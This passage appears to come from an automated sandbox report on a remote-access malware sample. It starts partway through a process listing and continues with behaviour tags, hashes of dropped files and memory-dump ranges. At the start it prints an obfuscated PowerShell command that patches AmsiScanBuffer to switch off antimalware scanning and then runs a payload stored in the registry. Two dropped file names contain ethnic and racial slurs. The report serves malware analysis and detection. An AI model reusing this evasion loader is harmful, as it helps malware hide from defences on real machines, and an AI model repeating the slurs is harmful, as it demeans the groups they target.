@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$lnGkqgDuMie=$lXgssjUwdnDdn.GetMethod('Ge'+'t'+''+[Char](77)+''+[Char](111)+''+'d'+''+'u'+''+'l'+''+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'d'+[Char](108)+''+'l'+'')));$LnUUezLhWWpZzn=$WgxfxABIVVNppy.Invoke($Null,@([Object]$lnGkqgDuMie,[Object]('L'+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+'y'+'A')));$DbcLeGziDLBdtAYlH=$WgxfxABIVVNppy.Invoke($Null,@([Object]$lnGkqgDuMie,[Object](''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+'u'+'a'+[Char](108)+'P'+'r'+''+[Char](111)+'t'+[Char](101)+''+'c'+'t')));$xmDyuPI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LnUUezLhWWpZzn,$HqXSNFMCLrkDcZSBENe).Invoke('a'+[Char](109)+'s'+'i'+'.'+[Char](100)+''+'l'+'l');$JBVuTDQlAXQFioRcL=$WgxfxABIVVNppy.Invoke($Null,@([Object]$xmDyuPI,[Object](''+'A'+'ms'+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$vXklaNIAlL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DbcLeGziDLBdtAYlH,$XBdxjitDqIdPBOBdCbAMnS).Invoke($JBVuTDQlAXQFioRcL,[uint32]8,4,[ref]$vXklaNIAlL);[Runtime.InteropServices.Marshal]::Copy([Byte[]]([Byte](30+101),[Byte](47+187),[Byte](127-127),[Byte](84+100),[Byte](132-45),[Byte](165-165),[Byte](11-4),[Byte](184-56),[Byte](97+34),[Byte](219-27),[Byte](15-15),[Byte](155+40),[Byte](84+53),[Byte](177+33)),0,$JBVuTDQlAXQFioRcL,111-97);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DbcLeGziDLBdtAYlH,$XBdxjitDqIdPBOBdCbAMnS).Invoke($JBVuTDQlAXQFioRcL,[uint32]8,0x20,[ref]$vXklaNIAlL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue('$'+'7'+'7'+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)""
                                                                                                                  2⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:4396
                                                                                                              • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                1⤵
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Checks processor information in registry
                                                                                                                • NTFS ADS
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:5528

                                                                                                              Network

                                                                                                              MITRE ATT&CK Enterprise v16

                                                                                                              Replay Monitor

                                                                                                              Loading Replay Monitor...

                                                                                                              Downloads

                                                                                                              • C:\Program Files (x86)\Orcus\Orcus.exe.config

                                                                                                                Filesize

                                                                                                                357B

                                                                                                                MD5

                                                                                                                a2b76cea3a59fa9af5ea21ff68139c98

                                                                                                                SHA1

                                                                                                                35d76475e6a54c168f536e30206578babff58274

                                                                                                                SHA256

                                                                                                                f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839

                                                                                                                SHA512

                                                                                                                b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Orcus.exe.log

                                                                                                                Filesize

                                                                                                                1KB

                                                                                                                MD5

                                                                                                                23095077e59941121be408de05f8843b

                                                                                                                SHA1

                                                                                                                6a85a4fb6a47e96b4c65f8849647ff486273b513

                                                                                                                SHA256

                                                                                                                49cc85a6bad5faf998eae8f1156e4a3cdd0273ff30a7828f5545689eb22e3fe5

                                                                                                                SHA512

                                                                                                                05644cd4aa2128e4c40993e4033ae3102705ee27c157d8376180c81e58b61c2801ca8deed6a256c79bc409e40f9ab5c66e2b2492f6c60871fb575eb6cce73211

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\OrcusWatchdog.exe.log

                                                                                                                Filesize

                                                                                                                425B

                                                                                                                MD5

                                                                                                                bb27934be8860266d478c13f2d65f45e

                                                                                                                SHA1

                                                                                                                a69a0e171864dcac9ade1b04fc0313e6b4024ccb

                                                                                                                SHA256

                                                                                                                85ad0d9909461517acf2e24ff116ca350e9b7000b4eefb23aa3647423c9745b4

                                                                                                                SHA512

                                                                                                                87dd77feac509a25b30c76c119752cc25020cca9c53276c2082aef2a8c75670ef67e1e70024a63d44ae442b64f4bc464aee6691e80c525376bb7421929cfa3bb

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\$77nigga.exe

                                                                                                                Filesize

                                                                                                                1.5MB

                                                                                                                MD5

                                                                                                                ca54187827e3ef0d1b74772e30cc46ea

                                                                                                                SHA1

                                                                                                                a488e92ca039dc49767299ba6a6b78d27126d839

                                                                                                                SHA256

                                                                                                                28382a86a4980b9e60284f4f571f8fe64e2fe649d2d5aa64f2d378f8a162bf9e

                                                                                                                SHA512

                                                                                                                6b2d090b82a425040c3c2733fbcd0d07478a3894c3c8b271586f596d6842fad815a5d40fa46448357633fe0f56adc6c495f4477e9747cbfb2d93219656e2f5d5

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Install.exe

                                                                                                                Filesize

                                                                                                                164KB

                                                                                                                MD5

                                                                                                                f036e84b63600df39664d4abbfcabe9a

                                                                                                                SHA1

                                                                                                                54edc28ad4d2054e73447f3c4f51ca228da92d76

                                                                                                                SHA256

                                                                                                                e2c2e8828cb743fa822e18be80aa4371b7fee9cae2079f125812d5f04f294c48

                                                                                                                SHA512

                                                                                                                ffc2ab783f8a1cca32beeca2d2bba4ba657777914b2596673471bc11e42cbe54c2edbce84f2556fe031d6c82ab16c56b7303d44ed471d0c3bbefb7683bc5c3e9

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jew.exe

                                                                                                                Filesize

                                                                                                                907KB

                                                                                                                MD5

                                                                                                                29d53eec589f731082b73dadc9050b71

                                                                                                                SHA1

                                                                                                                57f85307e98dd2ab83947d552d5e8d5553fa1f0a

                                                                                                                SHA256

                                                                                                                a94393921e9a9280da6c9f354d69b6fd3c64323503465c0c33fe6d030c492c63

                                                                                                                SHA512

                                                                                                                770e8819852a32f395922a38cb093c5452107d93a6b11bd3b3dd37786680d26c2c740a068f25c1b684a7418f35285ea79ac0359daa7108f407c017a5888f9d9f

                                                                                                              • C:\Users\Admin\AppData\Roaming\OrcusWatchdog.exe

                                                                                                                Filesize

                                                                                                                9KB

                                                                                                                MD5

                                                                                                                913967b216326e36a08010fb70f9dba3

                                                                                                                SHA1

                                                                                                                7b6f8c2eb5b443e03c212b85c2f0edb9c76ad2bf

                                                                                                                SHA256

                                                                                                                8d880758549220154d2ff4ee578f2b49527c5fb76a07d55237b61e30bcc09e3a

                                                                                                                SHA512

                                                                                                                c6fcb98d9fd509e9834fc3fba143bd36d41869cc104fbce5354951f0a6756156e34a30796baaa130dd45de3ed96e039ec14716716f6da4569915c7ef2d2b6c33

                                                                                                              • C:\Windows\Temp\__PSScriptPolicyTest_c4mxh2nu.1tv.ps1

                                                                                                                Filesize

                                                                                                                60B

                                                                                                                MD5

                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                SHA1

                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                SHA256

                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                SHA512

                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                              • memory/412-154-0x0000017B81490000-0x0000017B814BB000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/412-155-0x0000017B81490000-0x0000017B814BB000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/412-146-0x0000017B81490000-0x0000017B814BB000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/412-151-0x0000017B81490000-0x0000017B814BB000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/412-152-0x0000017B81490000-0x0000017B814BB000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/412-153-0x0000017B81490000-0x0000017B814BB000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/464-233-0x0000000000AA0000-0x0000000000AA8000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/628-100-0x0000021908EC0000-0x0000021908EC8000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/628-102-0x0000021908ED0000-0x0000021908EF5000-memory.dmp

                                                                                                                Filesize

                                                                                                                148KB

                                                                                                              • memory/628-111-0x0000021908F00000-0x0000021908F2B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/628-103-0x0000021908F00000-0x0000021908F2B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/628-94-0x0000021908EC0000-0x0000021908EC8000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/628-95-0x0000021908EC0000-0x0000021908EC8000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/628-110-0x0000021908F00000-0x0000021908F2B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/628-98-0x0000021908EC0000-0x0000021908EC8000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/628-99-0x0000021908EC0000-0x0000021908EC8000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/628-112-0x0000021908F00000-0x0000021908F2B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/628-93-0x0000021908EB0000-0x0000021908EB5000-memory.dmp

                                                                                                                Filesize

                                                                                                                20KB

                                                                                                              • memory/628-109-0x0000021908F00000-0x0000021908F2B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/628-104-0x0000021908F00000-0x0000021908F2B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/688-122-0x00000269BF690000-0x00000269BF6BB000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/688-126-0x00007FF9B7110000-0x00007FF9B7120000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/688-116-0x00000269BF690000-0x00000269BF6BB000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/688-125-0x00000269BF690000-0x00000269BF6BB000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/688-124-0x00000269BF690000-0x00000269BF6BB000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/688-123-0x00000269BF690000-0x00000269BF6BB000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/688-121-0x00000269BF690000-0x00000269BF6BB000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/764-51-0x0000000005B20000-0x0000000005BB2000-memory.dmp

                                                                                                                Filesize

                                                                                                                584KB

                                                                                                              • memory/764-41-0x0000000006030000-0x00000000065D6000-memory.dmp

                                                                                                                Filesize

                                                                                                                5.6MB

                                                                                                              • memory/764-37-0x0000000000F10000-0x0000000000FF8000-memory.dmp

                                                                                                                Filesize

                                                                                                                928KB

                                                                                                              • memory/764-39-0x00000000058D0000-0x00000000058DE000-memory.dmp

                                                                                                                Filesize

                                                                                                                56KB

                                                                                                              • memory/764-40-0x00000000058E0000-0x000000000593C000-memory.dmp

                                                                                                                Filesize

                                                                                                                368KB

                                                                                                              • memory/764-52-0x0000000005A60000-0x0000000005A72000-memory.dmp

                                                                                                                Filesize

                                                                                                                72KB

                                                                                                              • memory/980-137-0x000001F1BAAE0000-0x000001F1BAB0B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/980-132-0x000001F1BAAE0000-0x000001F1BAB0B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/980-142-0x00007FF9B7110000-0x00007FF9B7120000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/980-141-0x000001F1BAAE0000-0x000001F1BAB0B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/980-140-0x000001F1BAAE0000-0x000001F1BAB0B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/980-139-0x000001F1BAAE0000-0x000001F1BAB0B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/980-138-0x000001F1BAAE0000-0x000001F1BAB0B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/3424-75-0x00007FF9D6270000-0x00007FF9D6D32000-memory.dmp

                                                                                                                Filesize

                                                                                                                10.8MB

                                                                                                              • memory/3424-35-0x00007FF9D6270000-0x00007FF9D6D32000-memory.dmp

                                                                                                                Filesize

                                                                                                                10.8MB

                                                                                                              • memory/3424-36-0x0000027F7E680000-0x0000027F7E69A000-memory.dmp

                                                                                                                Filesize

                                                                                                                104KB

                                                                                                              • memory/3424-34-0x0000027F7C910000-0x0000027F7CA9E000-memory.dmp

                                                                                                                Filesize

                                                                                                                1.6MB

                                                                                                              • memory/4396-90-0x00007FF9F7080000-0x00007FF9F7289000-memory.dmp

                                                                                                                Filesize

                                                                                                                2.0MB

                                                                                                              • memory/4396-92-0x00007FF9F50D0000-0x00007FF9F518D000-memory.dmp

                                                                                                                Filesize

                                                                                                                756KB

                                                                                                              • memory/4396-50-0x000002927DB90000-0x000002927DBB2000-memory.dmp

                                                                                                                Filesize

                                                                                                                136KB

                                                                                                              • memory/4396-89-0x000002927DC20000-0x000002927DC4A000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/4396-91-0x00007FF9F48E0000-0x00007FF9F4C54000-memory.dmp

                                                                                                                Filesize

                                                                                                                3.5MB

                                                                                                              • memory/4624-620-0x00000285F5400000-0x00000285F54B2000-memory.dmp

                                                                                                                Filesize

                                                                                                                712KB

                                                                                                              • memory/4624-577-0x00000285F52F0000-0x00000285F5340000-memory.dmp

                                                                                                                Filesize

                                                                                                                320KB

                                                                                                              • memory/4624-1059-0x00000285F5A10000-0x00000285F5A22000-memory.dmp

                                                                                                                Filesize

                                                                                                                72KB

                                                                                                              • memory/4624-576-0x00000285F5260000-0x00000285F529A000-memory.dmp

                                                                                                                Filesize

                                                                                                                232KB

                                                                                                              • memory/4624-1060-0x00000285F5A70000-0x00000285F5AAC000-memory.dmp

                                                                                                                Filesize

                                                                                                                240KB

                                                                                                              • memory/4624-681-0x00000285F5390000-0x00000285F53DA000-memory.dmp

                                                                                                                Filesize

                                                                                                                296KB

                                                                                                              • memory/4624-682-0x00000285F54C0000-0x00000285F54EA000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/4624-680-0x00000285F5340000-0x00000285F538C000-memory.dmp

                                                                                                                Filesize

                                                                                                                304KB

                                                                                                              • memory/4624-622-0x00000285F52A0000-0x00000285F52EE000-memory.dmp

                                                                                                                Filesize

                                                                                                                312KB

                                                                                                              • memory/5324-68-0x0000000004F90000-0x0000000004FA2000-memory.dmp

                                                                                                                Filesize

                                                                                                                72KB

                                                                                                              • memory/5324-1068-0x0000000006CC0000-0x0000000006CD2000-memory.dmp

                                                                                                                Filesize

                                                                                                                72KB

                                                                                                              • memory/5324-77-0x0000000005CF0000-0x0000000005D00000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/5324-76-0x0000000005CC0000-0x0000000005CD8000-memory.dmp

                                                                                                                Filesize

                                                                                                                96KB

                                                                                                              • memory/5324-1044-0x00000000070D0000-0x0000000007136000-memory.dmp

                                                                                                                Filesize

                                                                                                                408KB

                                                                                                              • memory/5324-78-0x0000000005FB0000-0x0000000005FBA000-memory.dmp

                                                                                                                Filesize

                                                                                                                40KB

                                                                                                              • memory/5324-1072-0x0000000007820000-0x00000000079E2000-memory.dmp

                                                                                                                Filesize

                                                                                                                1.8MB

                                                                                                              • memory/5324-69-0x00000000053D0000-0x000000000541E000-memory.dmp

                                                                                                                Filesize

                                                                                                                312KB

                                                                                                              • memory/5324-1071-0x0000000007540000-0x000000000764A000-memory.dmp

                                                                                                                Filesize

                                                                                                                1.0MB

                                                                                                              • memory/5324-1067-0x00000000079F0000-0x0000000008008000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.1MB

                                                                                                              • memory/5324-1069-0x0000000007180000-0x00000000071BC000-memory.dmp

                                                                                                                Filesize

                                                                                                                240KB

                                                                                                              • memory/5324-1070-0x00000000073D0000-0x000000000741C000-memory.dmp

                                                                                                                Filesize

                                                                                                                304KB

                                                                                                              • memory/5360-0-0x00007FF9D6273000-0x00007FF9D6275000-memory.dmp

                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/5360-3-0x00007FF9D6270000-0x00007FF9D6D32000-memory.dmp

                                                                                                                Filesize

                                                                                                                10.8MB

                                                                                                              • memory/5360-38-0x00007FF9D6270000-0x00007FF9D6D32000-memory.dmp

                                                                                                                Filesize

                                                                                                                10.8MB

                                                                                                              • memory/5360-1-0x0000000000990000-0x0000000000B9C000-memory.dmp

                                                                                                                Filesize

                                                                                                                2.0MB

                                                                                                              • memory/5928-1030-0x0000000000EC0000-0x0000000000FA8000-memory.dmp

                                                                                                                Filesize

                                                                                                                928KB